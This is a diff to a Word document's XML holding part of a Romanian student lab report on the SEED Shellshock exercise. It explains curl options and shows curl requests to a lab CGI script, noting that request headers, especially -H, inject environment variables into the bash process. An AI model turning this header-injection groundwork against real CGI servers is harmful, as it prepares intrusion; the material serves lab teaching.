+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>e  -&gt;  specifica o adresa URL pentru a fi folosită ca referință în antetul "Referer" al cererii HTTP (indică pagina web de pe care a fost inițiată cererea curentă)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>curl -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId17">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>http://www.</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>birlutiuclaudiu</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId18">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>.com/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">" -v </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId19">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="13">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>546735</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>88900</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="4928870" cy="1011555"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="12" name="Image12" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="12" name="Image12" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4928870" cy="1011555"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>H -&gt; va permite să se specifice un antet suplimentar HTTP pentru cererea HTTP (pot include informații despre ce tip de continut avem sau chair date de autentificare)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>curl -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>H</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "Authorization: Bearer </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>dadasdasdasdasdd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">" -v </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId21">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="14">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-129540</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="1102360"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="13" name="Image13" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="13" name="Image13" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1102360"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Am combinat toate aceste optinui într-o singura comanda și am observat ca am modificat variabilele de mediu din cadrul procesului deschis în bash astfel: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>curl -A "BirlutiuAgent" -e "www.birlutiu.com" -H "STRING: ATAC" -v http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="15">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-142875</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-100330</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="4183380"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="14" name="Image14" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="14" name="Image14" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="4183380"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">observam cum putem injecat variabile de mediu sau ale modifica în cardul procesului curent cu ajutorul optiunilor date, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>mai ales prin optiunea -H</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -1806,7 +3143,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId9"/>
+      <w:headerReference w:type="default" r:id="rId24"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:left="1440" w:right="1440" w:header="720" w:top="777" w:footer="0" w:bottom="1440" w:gutter="0"/>
@@ -2282,6 +3619,417 @@
   <w:abstractNum w:abstractNumId="4">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
